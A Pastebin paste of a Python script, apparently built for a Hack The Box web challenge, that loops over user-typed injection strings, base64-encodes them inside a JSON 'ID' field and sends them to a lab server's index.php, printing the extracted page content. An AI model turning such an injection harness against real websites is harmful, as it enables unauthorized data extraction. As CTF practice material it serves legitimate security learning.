Advertisement
Guest User

Untitled

a guest
Jan 18th, 2020
115
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 2.41 KB | None | 0 0
  1. #!/usr/bin/env python3
  2.  
  3. #requests is a good python way for us to get the page and manipulate web requests
  4. import requests
  5. #our hint at the bottom of the page says that we may need to be performing some base64 encoding
  6. import base64
  7. #parse out all the html and just show us content, makes usage of the program a little easier
  8. from bs4 import BeautifulSoup
  9. #used to get arguments and exit using system function
  10. import sys
  11. #library to help us close the program if keyboard interrupt is pressed
  12. import signal
  13. #Error Handling
  14. from builtins import ConnectionRefusedError
  15. if (input == "exit"):
  16. print("Goodbye")
  17. sys.exit()
  18. #Checks to make sure you used correct number of args
  19. if (len(sys.argv) != 2):
  20. #basic string formatting
  21. print("Usage: {} <port number>".format(sys.argv[0]))
  22. #tell system to exit the program
  23. sys.exit()
  24.  
  25. #make a function to kill our infinite program when ctrl + c is pressed
  26. def keyboardInterruptHandler(signal,frame):
  27. print("\nKeyboardInterrupt detected. Exiting...")
  28. sys.exit()
  29. #use the signal library to detect the press, and execute our handler
  30. signal.signal(signal.SIGINT, keyboardInterruptHandler)
  31. #set port to whatever argv 1 was
  32. port = sys.argv[1]
  33. #infinite loop for injections to never stop
  34. while True:
  35. try:
  36. #get injection input from user
  37. oofValue = input("Query for ID param here: ")
  38. #create an unencoded utf styled object, adding our payload from the user input in
  39. payloadStringUnencoded = '{\"ID\":\"' + oofValue + '\"}'
  40. #base 64 encode the string after it has been transformed into a bytes object
  41. payloadStringEncoded = base64.b64encode(bytes(payloadStringUnencoded, encoding='ascii'))
  42. #final payload that is re encoded back into utf-8
  43. finalPayload = payloadStringEncoded.decode("utf-8")
  44. #injection url, rigged with the port number and our payload
  45. requestURL = "http://docker.hackthebox.eu:{0}/index.php?obj={1}".format(port,finalPayload)
  46. #go get the juicy data
  47. requestObject = requests.get(url = requestURL)
  48. #return it as pure html, this way we can just pull all the weird info
  49. pageToParse = requestObject.text
  50. #parse out valid string content using BeautifulSoup
  51. outData = BeautifulSoup(pageToParse, 'lxml')
  52. print(outData.text.strip())
  53. except requests.exceptions.ConnectionError:
  54. print("Connection refused, check your port")
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement